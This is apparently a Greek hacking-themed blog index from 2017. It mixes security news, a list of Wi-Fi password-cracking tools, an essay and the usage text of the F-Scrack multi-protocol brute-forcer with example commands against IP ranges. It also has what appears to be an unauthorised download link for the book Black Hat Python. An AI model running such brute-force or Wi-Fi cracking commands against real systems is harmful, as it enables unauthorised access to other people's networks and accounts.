Web Analytics Made Easy - StatCounter
FoulsCode

Εμφάνιση αναρτήσεων με ετικέτα Hacking. Εμφάνιση όλων των αναρτήσεων
Εμφάνιση αναρτήσεων με ετικέτα Hacking. Εμφάνιση όλων των αναρτήσεων

18 Νοεμβρίου 2017

To 90% των κυβερνο-επιθέσεων πραγματοποιείται μέσω phishing



Ολοένα και πιο περίπλοκο γίνεται το διεθνές τοπίο των ψηφιακών απειλών, θέτοντας επιχειρήσεις, δημόσιους οργανισμούς και...
πολίτες σε κατάσταση υψηλού συναγερμού. Παρά το γεγονός ότι οι μέθοδοι που χρησιμοποιεί το ψηφιακό έγκλημα δεν έχουν αλλάξει ιδιαίτερα, οι κυβερνοεπιθέσεις έχουν γίνει πιο μαζικές, έχουν περάσει από ένα τοπικό σε ένα διεθνές επίπεδο και είναι πλέον, σε μεγαλύτερο ποσοστό, αρκετά περίπλοκες.

Σύμφωνα με τα στοιχεία που παρουσίασε η Microsoft Hellas, σήμερα το 90% των ψηφιακών επιθέσεων πραγματοποιείται με τη μέθοδο του phishing (ηλεκτρονικού “ψαρέματος”). Όπως εξήγησε η ειδική σε θέματα cybersecurity, Sr Director Marketing, Enterprise Cybersecurity Group της Microsoft Corporation, κυρία Johnnie Konstantas, οι κυβερνοεπιθέσεις αποτελούν πλέον καθημερινότητα για τις επιχειρήσεις και τους δημόσιους οργανισμούς.

Είτε πρόκειται για ένα phishing e-mail, είτε για μια μαζική επίθεση, που επηρεάζει συνολικά τη λειτουργία ενός οργανισμού τοπικά ή και σε διεθνές επίπεδο, οι κυβερνοεπιθέσεις αποτελούν, σήμερα, μια από τις βασικές ανησυχίες όχι μόνο των υπεύθυνων ΙΤ, αλλά και των διοικήσεων των εταιριών, καθώς μπορούν να οδηγήσουν σε απώλειες τόσο σε οικονομικό, όσο και σε επίπεδο αξιοπιστίας προς τους πελάτες και συνεργάτες.

Η ειδική σε θέματα κυβερνοασφάλειας Johnnie Konstantas, βρέθηκε στην Αθήνα και μίλησε για τους τρόπους με τους οποίους οι επιχειρήσεις μπορούν να προφυλαχθούν από τις κυβερνοεπιθέσεις στο σύγχρονο ψηφιακό περιβάλλον

Στο πλαίσιο της παρουσίασης της σε εκδήλωση με θέμα την κυβερνοασφάλεια, την ανθεκτικότητα των εταιρειών και τα διαθέσιμα εργαλεία προστασίας, η κυρία Konstantas μίλησε για το διεθνές περιβάλλον κυβερνοεπιθέσεων, τις τελευταίες τάσεις και μεθόδους που χρησιμοποιούνται κι εστίασε στους τρόπους με τους οποίους οι εταιρίες μπορούν να προστατευθούν με τη βοήθεια της τεχνολογίας.

Συνεχής εγρήγορση
Από την πλευρά τους οι εταιρίες, θα πρέπει να είναι σε συνεχή εγρήγορση και να αξιοποιούν τις δυνατότητες της τεχνολογίας προκειμένου να παρακολουθούν, να καταγράφουν και να εντοπίζουν οποιαδήποτε ύποπτη κίνηση σε όλο το εύρος των δραστηριοτήτων τους. Αντικείμενο συνεχούς παρακολούθησης, σύμφωνα με τους ειδικούς, πρέπει να είναι το σύνολο των εταιρικών δραστηριοτήτων, από τους απλούς αισθητήρες μέχρι τα data centers. Φυσικά οι επιχειρήσεις πρέπει να είναι έτοιμες να αντιδράσουν άμεσα, μειώνοντας τον χρόνο μεταξύ εντοπισμού της επίθεσης και δράσης.

Όπως ανέφερε η κυρία Konstantas, απαραίτητη προϋπόθεση για την κυβερνοασφάλεια είναι η συνεργασία.

“Οι υπηρεσίες cloud της Microsoft έχουν δημιουργηθεί βάσει υψηλών προδιαγραφών ασφάλειας. Η Microsoft διενεργεί ελέγχους και παρέχει δυνατότητες, που βοηθούν τις εταιρίες να προστατεύσουν τα δεδομένα και τις εφαρμογές τους. Δεν θα πρέπει, όμως, να ξεχνάμε ότι η ασφάλεια είναι αποτέλεσμα συνεργασίας. Τα δεδομένα ανήκουν στις εταιρίες/οργανισμούς κι έχουν οι ίδιες την ευθύνη να τα προστατεύουν και να αξιοποιούν σωστά τα εργαλεία που είναι διαθέσιμα”.



Πηγή
Διαβάστε Περισσότερα »

1 Νοεμβρίου 2017

Χάκερς έσπασαν τους διαδικτυακούς τείχους ασφαλείας ρωσικών πρακτορείων

Αντιμέτωπα με κυβερνοεπιθέσεις, μέσω ενός ιού που ονομάζεται Badrabbit, βρέθηκαν πριν από λίγες ώρες τουλάχιστον τρία ρωσικά ΜΜΕ.


Όπως ανακοίνωσε μέσω facebook ο επικεφαλής του ειδησεογραφικού πρακτορείου Interfax, Γιούρι Πογκορέλι, χάκερς κατάφεραν και έσπασαν τους διαδικτυακούς τοίχους ασφαλείας και εισχώρησαν στις εσωτερικές δομές των ΜΜΕ.

Σύμφωνα με την εταιρεία που ασχολείται με την κυβερνοασφάλεια Group-IB, τουλάχιστον τρία ρωσικά ΜΜΕ βρέθηκαν αντιμέτωπα με κυβερνοεπιθέσεις, μέσω του ιού Badrabbit.

Στο στόχαστρο βρέθηκαν και κρατικοί φορείς της Ουκρανίας.

Ειδικοί εργάζονται πυρετωδώς ώστε να αποκαταστήσουν τη λειτουργία των υπηρεσιών.

via: tribune.gr
Διαβάστε Περισσότερα »

Τα 10 καλύτερα Wi-fi Hacking Tools για το 2017






Μερικές φορές, όταν βρίσκεστε σε ένα δίκτυο, θέλετε να ελέγξετε τι συμβαίνει σε αυτό. Κυρίως σε μεγάλες εταιρείες, όταν ένας εργοδότης θέλει να ελέγξει ποιος κάνει τι στο δίκτυό του. Για τέτοιες περιπτώσεις, υπάρχουν μερικά εργαλεία Wi-fi Hacking, που επιτρέπουν στους χρήστες να αναλύουν τα πακέτα και να δουν τι κάνουν άλλοι χρήστες.

Aircrack-ng

Το Aircrack-ng είναι ένα από τα πιο δημοφιλή εργαλεία διάσπασης κωδικών πρόσβασης που μπορείτε να χρησιμοποιήσετε για WEP και WPA 802.11a / b / g. Το Aircrack χρησιμοποιεί τους καλύτερους αλγόριθμους για την ανάκτηση ασύρματων κωδικών πρόσβασης με τη λήψη πακέτων. Μόλις συγκεντρωθούν αρκετά πακέτα, προσπαθεί να ανακτήσει τον κωδικό πρόσβασης. Για να επιταχύνει την επίθεση, εφαρμόζει μια τυπική επίθεση FMS με κάποιες βελτιστοποιήσεις. Υποστηρίζει τους περισσότερους ασύρματους προσαρμογείς και είναι σχεδόν εγγυημένο ότι θα πετύχει το στόχο του.

AirSnort

Το AirSnort είναι ένα άλλο δημοφιλές εργαλείο Hacking για την αποκρυπτογράφηση της κρυπτογράφησης WEP σε ένα δίκτυο wi-fi 802.11b. Είναι ένα δωρεάν εργαλείο και συνοδεύει πλατφόρμες Linux και Windows. Αυτό το εργαλείο δεν συντηρείται πλέον, αλλά είναι ακόμα διαθέσιμο για λήψη από το Sourceforge. Το AirSnort λειτουργεί με παθητική παρακολούθηση μεταδόσεων και υπολογιστικών κλειδιών κρυπτογράφησης μόλις λάβει αρκετά πακέτα. Αυτό το εργαλείο είναι απλό στη χρήση. Εάν σας ενδιαφέρει, μπορείτε να δοκιμάσετε αυτό το εργαλείο για να σπάσετε κωδικούς WEP.

Cain & Able

Το Cain & Able είναι ένα δημοφιλές εργαλείο για σπάσιμο κωδικών πρόσβασης. Αναπτύσσεται για να παρεμποδίζει την κυκλοφορία του δικτύου και στη συνέχεια να ανακαλύπτει τους κωδικούς πρόσβασης μέσω bruteforcing του κωδικού πρόσβασης, χρησιμοποιώντας μεθόδους επίθεσης cryptanalysis. Μπορεί επίσης να ανακτήσει τα κλειδιά ασύρματου δικτύου αναλύοντας τα πρωτόκολλα δρομολόγησης. Αν προσπαθείτε να μάθετε ασύρματη ασφάλεια και σπάσιμο κωδικών πρόσβασης, θα πρέπει να δοκιμάσετε αυτό το εργαλείο.

Kismet

Είναι ένα εργαλείο Hacking που λειτουργεί με οποιαδήποτε κάρτα wi-fi που υποστηρίζει λειτουργία rfmon. Παίρνει παθητικά πακέτα για τον εντοπισμό δικτύων και την ανίχνευση κρυφών δικτύων. Είναι κατασκευασμένο σύμφωνα με αρθρωτή αρχιτεκτονική client/server. Διατίθεται για πλατφόρμες Linux, OSX, Windows και BSD.

NetStumbler

Το NetStumbler είναι ένα δημοφιλές εργαλείο των Windows για να βρείτε ανοικτά σημεία ασύρματης πρόσβασης. Αυτό το εργαλείο είναι δωρεάν και είναι διαθέσιμο για Windows. Βασικά το NetStumbler χρησιμοποιείται για wardriving, επαλήθευση διαμορφώσεων δικτύου, εύρεση θέσεων με κακό δίκτυο, ανίχνευση μη εξουσιοδοτημένων σημείων πρόσβασης και πολλά άλλα. Αλλά το εργαλείο έχει επίσης ένα μεγάλο μειονέκτημα. Μπορεί εύκολα να εντοπιστεί από τα περισσότερα διαθέσιμα συστήματα ανίχνευσης εισβολών ασύρματης επικοινωνίας.

inSSIDer

Το inSSIDer είναι ένας δημοφιλής σαρωτής Wi-Fi για λειτουργικά συστήματα Microsoft Windows και OS X. Αρχικά το εργαλείο ήταν ανοιχτό. Αργότερα έγινε premium και τώρα κοστίζει 19,99 δολάρια. Ανακηρύχτηκε επίσης ως “Best Opensource Software in Networking”. Ο ασύρματος ανιχνευτής inssIDer μπορεί να κάνει διάφορες εργασίες, όπως εύρεση ανοιχτών σημείων πρόσβασης Wi-Fi, ανίχνευση ισχύος σήματος και αποθήκευση αρχείων καταγραφής με εγγραφές GPS.

WireShark

Το WireShark είναι ο αναλυτής πρωτοκόλλου δικτύου. Σας επιτρέπει να ελέγξετε τι συμβαίνει στο δίκτυό σας. Παίρνει πακέτα και σας επιτρέπει να ελέγξετε τα δεδομένα. Εκτελείται σε Windows, Linux, OS X, Solararies, FreeBSD και άλλα. Το WireShark απαιτεί καλή γνώση των πρωτοκόλλων δικτύου για την ανάλυση των δεδομένων που έχουν ληφθεί με το εργαλείο. Εάν δεν έχετε καλή γνώση γι ‘αυτό, ίσως να μην βρείτε αυτό το εργαλείο ενδιαφέρον. Έτσι, δοκιμάστε το μόνο εάν είστε σίγουροι για τις γνώσεις σας.

CoWPAtty

Το CoWPAtty είναι ένα αυτοματοποιημένο εργαλείο Hacking για το WPA-PSK με βάση το λεξιλόγιο. Τρέχει σε λειτουργικό σύστημα Linux. Αυτό το πρόγραμμα έχει μια διασύνδεση γραμμής εντολών και τρέχει σε μια λίστα λέξεων που περιέχει τον κωδικό πρόσβασης που θα χρησιμοποιηθεί στην επίθεση. Η χρήση του εργαλείου είναι πραγματικά απλή, αλλά είναι αργή. Η νέα έκδοση του εργαλείου προσπάθησε να βελτιώσει την ταχύτητα χρησιμοποιώντας ένα προκαθορισμένο αρχείο κατακερματισμού. Αυτό το προ-υπολογισμένο αρχείο περιέχει περίπου 172000 αρχεία λεξικού για περίπου 1000 πιο δημοφιλή SSI. Αλλά αν το SSID σας δεν ανήκει στα 1000 αυτά, είστε άτυχοι.

Airjack

Το Airjack είναι ένα εργαλείο έγχυσης πακέτων Wi-Fi 802.11. Αυτό το εργαλείο ασύρματης διάσπασης είναι πολύ χρήσιμο για την έγχυση παγιδευμένων πακέτων και για τη δημιουργία δικτύου κάτω από επίθεση άρνησης υπηρεσίας. Αυτό το εργαλείο μπορεί επίσης να χρησιμοποιηθεί για έναν άνθρωπο στη μέση επίθεση στο δίκτυο.

WepAttack

Το WepAttack είναι ένα εργαλείο Linux ανοιχτού κώδικα για το σπάσιμο κλειδιών WEP 802.11. Αυτό το εργαλείο εκτελεί μια ενεργή επίθεση λεξικού με τη δοκιμή εκατομμυρίων λέξεων για να βρει το κλειδί εργασίας. Για την εργασία με το WepAttack απαιτείται μόνο μια κάρτα WLAN που λειτουργεί.




secnews.gr
Διαβάστε Περισσότερα »

Υποκλοπή προσωπικών δεδομένων. Τρόποι που χρησιμοποιούν οι χάκερ για να ελέγχουν και να διαχειρίζονται απόρρητα στοιχεία





Η εξέλιξη της τεχνολογίας επιτρέπει στους χρήστες του διαδικτύου να έχουν πρόσβαση σε πληθώρα δεδομένων, που εξυπηρετούν και διευκολύνουν την καθημερινότητα.
Όμως, η αλόγιστη και αφελής χρήση του, αυξάνει τον κίνδυνο για παράνομη επεξεργασία και υποκλοπή προσωπικών δεδομένων.
Οι ιστοσελίδες με διαφημίσεις, οι online παραγγελίες προϊόντων, έως και η χρήση wi-fi σε δημόσιους χώρους, είναι μερικοί από τους τρόπους που οι «διαδικτυακοί απατεώνες» έχουν επινοήσει και χρησιμοποιούν προς όφελός τους.
Έρευνα που πραγματοποιήθηκε, επιβεβαιώνει την έλλειψη ενημέρωσης σχετικά με την ανάγκη προστασίας και διαφύλαξης των προσωπικών δεδομένων.
Για παράδειγμα, η πλειοψηφία των συμμετεχόντων επιλέγει το πλήκτρο «αποδοχή» όποτε ζητηθεί από κάποια ιστοσελίδα, χωρίς να έχει διαβάσει τους όρους.
Με τον τρόπο αυτό, επιτρέπεται ο έλεγχος και η διαχείριση των δεδομένων τους από τρίτους και μπορεί να έχουν συναινέσει εν αγνοία τους, σε ενέργειες που θα τους κοστίσουν χρόνο και σε κάποιες περιπτώσεις και χρήμα.



Συχνοί τρόποι υποκλοπής δεδομένων

Το wi-fi σε δημόσιους χώρους, είναι μια κοινή τακτική υποκλοπής που χρησιμοποιείται για να αποκτηθεί πρόσβαση τόσο στο ηλεκτρονικό ταχυδρομείο, όσο και σε τραπεζικούς λογαριασμούς.
Για να γίνει η παραβίαση, το μόνο που χρειάζεται είναι να στηθεί ένα ξεχωριστό δίκτυο wi-fi που παραπλανεί τους ανυποψίαστους, καθώς έχει το ίδιο όνομα με το αυθεντικό.
Έτσι, κακόβουλο λογισμικό εισχωρεί στον υπολογιστή, στο tablet ή σε άλλη ηλεκτρονική συσκευή και διαχειρίζεται τα απόρρητα δεδομένα.
Ακόμη ευκολότερος τρόπος, είναι η δημοσίευση ψεύτικων διαφημίσεων και εκπτωτικών κουπονιών, που χρειάζεται τα στοιχεία του τραπεζικού λογαριασμού.
Αν ο χρήστης δώσει τα στοιχεία, τότε ο χάκερ θα έχει πρόσβαση σε λογαριασμούς και αν δεν το αντιληφθεί εγκαίρως( ο κάτοχος), πολύ πιθανό να βρεθεί προ δυσάρεστης εκπλήξεως.
Χρειάζεται επίσης ιδιαίτερη προσοχή, στα προσωπικά δεδομένα που ο καθένας ανεβάζει στα μέσα κοινωνικής δικτύωσης.
Έχουν καταγραφεί περιστατικά, που δημοσιεύτηκε κάποια επικείμενη αγορά προϊόντος και ο παραβάτης κάλεσε για υποτιθέμενη επιβεβαίωση στοιχείων.
Παρόμοια απάτη μπορεί να συμβεί και με τις αγορές μέσω ίντερνετ, όταν η ιστοσελίδα της παραγγελίας είτε δεν είναι έγκυρη, είτε δεν αναγράφει όλα τα στοιχεία που επιβάλλει ο νόμος.




valueforlife.gr
Διαβάστε Περισσότερα »

Προσοχή σε όλους - Ο Internet Explorer διαρρέει ότι πληκτρολογείτε σε ιστότοπους (vid)






Εάν χρησιμοποιείτε τον Internet Explorer της Microsoft αυτήν τη στιγμή, ό, τι πληκτρολογείτε στη γραμμή διευθύνσεων του προγράμματος περιήγησης μπορεί να διαρρεύσει στις ιστοσελίδες.

Το ζήτημα αποκαλύφθηκε από τον ερευνητή ασφαλείας Manuel Caballero την Τρίτη στην ιστοσελίδα Broken Browser.


Όταν εκτελείται ένα script μέσα σε ένα object-html tag, το αντικείμενο θέσης (location object) θα μπερδευτεί και θα επιστρέψει την κύρια τοποθεσία αντί την δικής του. Για να είμαι ακριβής, θα επιστρέψει το κείμενο που γράφτηκε στη γραμμή διευθύνσεων έτσι οποιοσδήποτε γράφει ένας χρήστης θα είναι προσβάσιμος από τον εισβολέα.


Αυτό σημαίνει είναι ότι οι ιστοσελίδες μπορούν να τρέξουν ένα απλό script για να μάθουν τι πληκτρολογούν οι χρήστες στη γραμμή διευθύνσεων του Internet Εxplorer ενώ ο
χρήστης βρίσκεται στον κάθε ιστότοπο που χρησιμοποιεί το script.

Μπορείτε να ελέγξετε το παρακάτω poc για να δείτε εάν η έκδοση του Internet Explorer που χρησιμοποιείτε, ή οποιοδήποτε άλλο πρόγραμμα περιήγησης, επηρεάζεται από το ζήτημα.

https://www.cracking.com.ar/demos/ieaddressbarguess/

Απλά πληκτρολογήστε οτιδήποτε σας έρχεται στο μυαλό σας στη γραμμή διευθύνσεων του Internet Explorer ενώ βρίσκεστε στη σελίδα και μετά πατήστε το πλήκτρο Enter.

Η ιστοσελίδα θα παρεμποδίσει τη διαδικασία φόρτωσης, και θα εμφανίσει αυτό που πληκτρολογήσατε.

Δείτε και το demo video






secnews.gr
Διαβάστε Περισσότερα »

Μάθε πως κλέβουν το Apple ID της iPhone συσκευής σου





Η κλοπή του Apple ID και του κωδικού πρόσβασης του iPhone σας δεν αποτελεί τελικά δύσκολο εγχείρημα παρά την εμμονή της Apple για ασφάλεια καθώς χρειάζονται μόνο 30 σειρές κωδικών για να ολοκληρωθεί το πρώτο βήμα μιας επίθεσης phishing.Apple ID

Ουσιαστικά, σύμφωνα με τον προγραμματιστή, Felix Krause, χρειάζονται μόνο μερικά λεπτά για την αναδημιουργία ενός κωδικού πρόσβασης του Apple ID που εμφανίζεται στις iOS συσκευές καθιστώντας έτσι εύκολη την επίθεση phishing και κλέβοντας τα διαπιστευτήρια από ένα iPhone ή iPad.

Ο προγραμματιστής εξήγησε ότι ο κακόβουλος κώδικας θα μπορούσε να τοποθετηθεί σε νόμιμες εφαρμογές iOS που θα δώσουν την δυνατότητα στον εισβολέα να παρακάμψει την ασπίδα ασφαλείας του App Store και να φτάσει σε χιλιάδες συσκευές.

«Παρουσιάζεται ένα παράθυρο διαλόγου που μοιάζει ακριβώς με ένα αναδυόμενο παράθυρο του συστήματος. Επομένως, ο χρήστης μπορεί πολύ εύκολα να εξαπατηθεί.» εξήγησε, χωρίς όμως να δημοσιεύσει τον κώδικα για την αναδημιουργία του παραθύρου διότι την δεδομένη στιγμή εργάζεται πάνω στην επίλυση του προβλήματος σε συνεργασία με την Apple.

Το αναδυόμενο παράθυρο διαλόγου που ζητά τα credentials μπορεί να απαιτήσει περαιτέρω πληροφορίες συμπεριλαμβανομένου του 2-step verification κωδικού εάν η εφαρμογή αυτή είναι ενεργοποιημένη στο συγκεκριμένο λογισμικό.

Αυτό ουσιαστικά σημαίνει ότι κανέναν λογισμικό δεν είναι ασφαλές εκτός αν η Apple αποκλείσει όλες τις προσπάθειες που γίνονται έκτος του App Store και των Settings. Στη πραγματικότητα, αυτός είναι ένας τρόπος που μπορούν να προστατευτούν οι χρήστες από τις απάτες phishing μέχρι η εταιρεία να βρει κάποια λύση.

Ο προγραμματιστής συνιστά στους χρήστες να πατήσουν το home button του τηλεφώνου τους για να ελέγξουν αν η εφαρμογή κλείνει. Αν όντως κλείνει και το αίτημα κωδικού πρόσβασης εξαφανίζεται τότε πολύ πιθανόν να πρόκειται για μια επίθεση phishing. Μπορείτε να αποφύγετε την εισαγωγή διαπιστευτηρίων σε τέτοιου είδους αναδυόμενα παράθυρα μεταβαίνοντας στις ρυθμίσεις και εισάγοντας από εκεί τον κωδικό πρόσβασης.



SecNews
Διαβάστε Περισσότερα »

17 Αυγούστου 2017

Black Hat Python (Book)



Tο foulscode.com κάνει διαμερισμό συνδέσμων.

                       Κάντε ένα μια κοινοποίηση για να μας ενθαρρύνεται να συνεχίσουμε!



Book Description

When it comes to creating powerful and effective hacking tools, Python is the language of choice for most security analysts. But just how does the magic happen?

In Black Hat Python, the latest from Justin Seitz (author of the best-selling Gray Hat Python), you'll explore the darker side of Python's capabilities - writing network sniffers, manipulating packets, infecting virtual machines, creating stealthy trojans, and more.

Insider techniques and creative challenges throughout show you how to extend the hacks and how to write your own exploits.

When it comes to offensive security, your ability to create powerful tools on the fly is indispensable. Learn how in Black Hat Python.

Book Details

Publisher:No Starch Press

By:Justin Seitz

ISBN:978-1-59327-590-7

Year:2014

Pages:192

Language:English

File size:7.2 MB

File format:PDF



Download Link:

https://mega.nz/#!xuh3ALBR!xIYkdXYDlbwGxJGVMQxjyQkE76oavXpTZiVv_FY7AmE

Διαβάστε Περισσότερα »

7 Αυγούστου 2017

EQ-Γνώθι σαυτόν: 1.Συγκινησιακή πειρατεία


Ευχάριστο πολύ τον (TrevorC) για το κείμενο. Και έρχονται και αλλα μείνετε συντονισμένοι!



Κανονικά ήθελα σήμερα να "μπω στο ψητό" και να εξηγήσω το πως μπορεί κάποιος να αποκτήσει αυτογνωσία και έλεγχο πάνω στα συναισθήματά του. Αλλά δεν μπορώ να το κάνω αυτό αν δεν έχω εξηγήσει πρώτα τι είναι συναίσθημα, γιατί υπάρχουν και πως δουλεύουν. Δυστυχώς αν δεν έχετε αυτές τις γνώσεις δεν μπορείτε να προχωρήσετε παρακάτω διότι όπως και στο χάκινγκ είναι πολύ σημαντικό να μάθεις πρώτα πως δουλεύει κάτι ώστε να αρχίζεις να το "πειράζεις"

Κρυφό ΠεριεχόμενοΤο πιο πρωτόγονο κομμάτι του εγκεφάλου είναι αυτό που λέμε εγκεφαλικό στέλεχος και είναι κοινό σε όλα τα είδη που διαθέτουν νευρικό σύστημα. Αυτό το κομμάτι ρυθμίζει τις πιο βασικές ζωτικές λειτουργίες όπως την αναπνοή ή τον μεταβολισμό. Αυτό το μέρος του μυαλού δεν μπορεί κανείς να πει πως "μαθαίνει" διότι ρυθμίζει απλά διάφορες λειτουργίες του σώματος.



Ο εγκέφαλος αναπτύχθηκε από την βάση και προς τα πάνω. Μετά λοιπόν από το εγκεφαλικό στέλεχος ήρθαν τα συγκινησιακά κύτταρα, και φτιάχτηκαν έτσι οι συγκινησιακές περιοχές του εγκεφάλου, και από αυτές ήρθε ο νεοφλοιός ή αλλιώς ο σκεπτόμενος εγκέφαλος(ορίστε που μαθαίνουμε και βιολογία :p)

Το γεγονός οτι ο σκεπτόμενος εγκέφαλος ήρθε από τον συγκινησιακό εξηγεί πολλά για την σχέση συναισθήματος-λογικής.

Το πιο αρχαίο κομμάτι του συγκινησιακού εγκεφάλου είναι ο οσφρητικός λοβός ο οποίος σχετίζετε με την όσφρηση. Με τα χρόνια ο συγκινησιακός εγκέφαλος διογκώθηκε και έτσι ήρθε το μεταιχμιακό σύστημα με το οποίο θα ασχοληθούμε τώρα. Αυτό ανέπτυξε και μάθηση και μνήμη. Αυτό βοήθησε τον άνθρωπο να κάνει καλύτερες επιλογές. Ο νεοφλοιός (σκεπτόμενος εγκέφαλος) ο οποίος ήρθε μετά είναι η έδρα της σκέψης, της λογικής. Αυτό που διαχωρίζει ανθρώπους με ζώα. Ο νεοφλοιός μας κάνει να νιώθουμε αισθήματα ακόμα και για τα αισθήματά μας.

Όταν λοιπόν ακούτε κάποιον να λέει "Η καρδιά μου μου λέει αυτο, αλλά το μυαλό μου κάτι άλλο" στην πραγματικότητα ή καρδιά είναι ο πρωτόγονος συγκινησιακός εγκέφαλος ενώ το μυαλό ο σκεπτόμενος εγκέφαλος. Επειδή τα συναισθήματα είναι πρωτόγονα όμως δεν σημαίνει πως δεν χρειάζονται. Θα πούμε γι' αυτό σε άλλο θέμα.

Τι είναι λοιπόν η συγκινησιακή πειρατεία; Θα ήθελα να το αναλύσω πιο πολύ αλλά δεν θέλω να γράψω 100 σελίδες θέμα οπότε θα εξηγήσω τα βασικά. Υπήρξαν στιγμές που όλοι μας χάσαμε τον έλεγχο του εαυτού μας είτε αυτό ήταν λόγο θυμού, φόβου, έρωτα ή κάποιου άλλου αισθήματος. Ας πάρουμε τον θυμό για παράδειγμα, όλοι έχουμε θυμώσει τόσο που να μην μπορούμε να ελέγξουμε τις πράξεις μας και να μην μπορούμε να σκεφτούμε καθαρά. Είναι αυτή η τύφλωση που νιώθουμε.

Σε αυτό ευθύνεται ένα μέρος του μεταιχμιακού συστήματος η αμυγδαλή. Η αμυγδαλή πάει χέρι-χέρι με τον ιππόκαμπο και έχει συναισθηματική μνήμη. Δηλαδή αν δείτε έναν ξάδελφο στον δρόμο ο ιππόκαμπος είναι αυτός που θα αναγνωρίσει πως αυτός είναι ο Δημήτρης και η αμυγδαλή είναι αυτή που θα πει πως εσείς συμπαθείτε/αντιπαθείτε τον Δημήτρη. Η αμυγδαλή λοιπόν αναλύει ένα γεγονός και με βάση διάφορα πράγματα που θυμάται κρίνει αυτό το γεγονός ανάλογα. Λειτουργεί και ως συναγερμός. Ας πούμε όταν θα δείτε ένα φίδι η αμυγδαλή θα σας κάνει να συγκεντρωθείτε μέσω του φόβου και να πάρετε στάση "Μάχης ή Φυγής". Αυτό το κάνει κρατόντας τον υπόλοιπο εγκέφαλο "όμηρο" θάβοντας έτσι την λογική. 

Ο λόγος που γίνετε αυτό:

Ας πούμε ότι βλέπετε ένα λουλούδι. Το ερέθησμα περνά από το μάτι στον θάλαμο (μέρος του εγκεφάλου) μετά πηγαίνει στον νεοφλοιό όπου αναλύετε και μετά πάει στην αμυγδαλή. (Να σημειώσουμε εδώ ότι συμβαίνουν και άλλες διαδικασίες ανάμεσα αλλά δεν μας ενδιαφέρουν αυτήν την στιγμή). Έτσι ο άνθρωπος προλαβαίνει να σκεφτεί πρώτα και μετά να αναλύσει ή αμυγδαλή αν πρέπει να σημάνει συναγερμό ή όχι.

Υπάρχει όμως περίπτωση αντί το ερέθισμα να πάει από τον θάλαμο στον νεοφλοιό να πάει κατευθείαν στην αμυγδαλή αν κριθεί πως υπάρχει κίνδυνος. Έτσι ο άνθρωπος δεν σκέφτεται λογικά. Αυτό όπως καταλαβαίνετε γλιτώνει χρόνο σε κρίσιμες καταστάσεις. Το κακό είναι ενώ παλιά που οι άνθρωποι ζούσαν σε σπηλιές και βρίσκονταν σε κίνδυνο συνεχώς ήταν απαραίτητο στην σημερινή εποχή αυτή η συγκινησιακή πειρατεία είναι πολλές φορές λάθος και ανακριβείς. Όπως το να κάνεις κάτι κακό την ώρα που είσαι θυμωμένος.




Να προσθέσω πως η αμυγδαλή αναλύει καταστάσεις και προσπαθεί να αποφύγει τον κίνδυνο. Αν δει λοιπόν πως τα γεγονότα που συμβαίνουν εκείνη την στιγμή μοιάζουν με κάτι που σηνέβει χρόνια πριν και δεν είχε καλό τέλος, καλεί συγκινησιακή πειρατεία (εννοείτε βέβαια πως αυτό είναι υποσινείδητο και σε εσάς η κατάσταση να μην σας θυμήζει τίποτα). Το θέμα είναι πως τις περισσότερες φορές η κατάσταση δεν μοιάζει καθόλου με το προιγούμενο γεγονός και έτσι λανθασμένα γίνετε ο όλος χαμός.

(Το θέμα αυτό προέρχεται από το greekhacking.gr)

Διαβάστε Περισσότερα »

17 Ιουλίου 2017

F-Scrack is a single file bruteforcer supports multi-protocol






F-Scrack is a single file bruteforcer supports multi-protocol, no extra library requires except python standard library, which is ideal for a quick test.

Currently support protocol: FTP, MySQL, MSSQL,MongoDB,Redis,Telnet,Elasticsearch,PostgreSQL.

Compatible with OSX, Linux, Windows, Python 2.6+.







Usage:



 python F-Scrack.py -h 192.168.1 [-p 21,80,3306] [-m 50] [-t 10]

-h
Supports ip(192.168.1.1), ip range (192.168.1) (192.168.1.1-192.168.1.254), ip list (ip.ini) , maximum 65535 ips per scan.
-p
Ports you want to scan, use comma to separate multi ports. Eg 1433,3306,5432. 
Default scan ports(21,23,1433,3306,5432,6379,9200,11211,27017) if no ports specified.
-m
Number of threads. Default is 100.
-t
Seconds to wait before timeout.
-d
Dictionary file.
-n
Scan without ping scan(Live hosts detect).
Example:

python F-Scrack.py -h 10.111.1
python F-Scrack.py -h 192.168.1.1 -d pass.txt
python F-Scrack.py -h 10.111.1.1-10.111.2.254 -p 3306,5432 -m 200 -t 6
python F-Scrack.py -h ip.ini -n



Διαβάστε Περισσότερα »

16 Ιουλίου 2017

Νοοτροπία wanna-be hacker





Ευχάριστο τον (gcoder) για αυτό το θέμα!



Είναι ένα από τα θέματα που σκέφτομαι πάρα πολύ καιρό να κάνω και με θλίβει πραγματικά που με φτάσατε στο σημείο να το δημιουργήσω...

Αυτό το θέμα αφορά άτομα που θέλουν να γίνουν hackers αλλά δεν θέλουν να σπαταλήσουν χρόνο ή περιμένουν από κάποιον άλλον να τους μάθει... Επιπλέον για κάποιον παράξενο λόγο γίνεσαι κακός αν δεν του βοηθήσεις σε αυτό που σε ρωτάνε, άσχετα με το αν δεν τους βοηθάς επειδή δεν έχουν τις απαιτούμενες γνώσεις για να το πετύχουν.

Πριν προχωρήσω θα πω ότι δεν γράφω αυτό το άρθρο για κάποιο συγκεκριμένο άτομο και πως σκέφτομαι να το γράψω εδώ και αρκετό καιρό... Επιπλέον δεν ανταποκρίνεται μόνο σε ένα άτομο αλλά σε μια ομάδα ατόμων...

Τώρα ας ξεκινήσουμε από την αρχή.

Πολύ από εσάς γράφεστε στο φόρουμ και είσαστε στο 0. Συνήθως ρωτάτε βοήθεια για το πως να ξεκινήσετε να ασχολείστε και συνήθως καταλήγετε με έναν κατάλογο από βιβλία που πρέπει να διαβάσετε...

Δεν ξέρω τι κάνετε όταν φεύγετε αλά συνήθως σας βλέπω μετά από μια βδομάδα και ξεκινάτε να ρωτάτε πράγματα τύπου:
Πως μπορώ να χακάρω ένα pc με το metasploit/armitage/nmap/nessus και οποιοδήποτε άλλο πρόγραμμα βρήκατε στο youtube
Πως μπορώ να χακάρω facebook.
Πως μπορώ να κάνω sqli/xss/rce κλπ και να πάρω πρόσβαση σε μια ιστοσελίδα.
Γιατί το rat μου δουλεύει μόνο σε local δίκτυο.

Η λίστα αυτή συνεχίζετε κατά πολύ μεγάλο βαθμό αλλά για λόγους βιασύνης δεν θα την συνεχίσω τώρα. Τα πράγματα είναι ακόμα ποιο τραγικά όταν ένα άτομο σε ρωτάει όλες τις παραπάνω ερώτησης όπου βρίσκονται σε διαφορετικούς τομείς του hacking η κάθε μία.

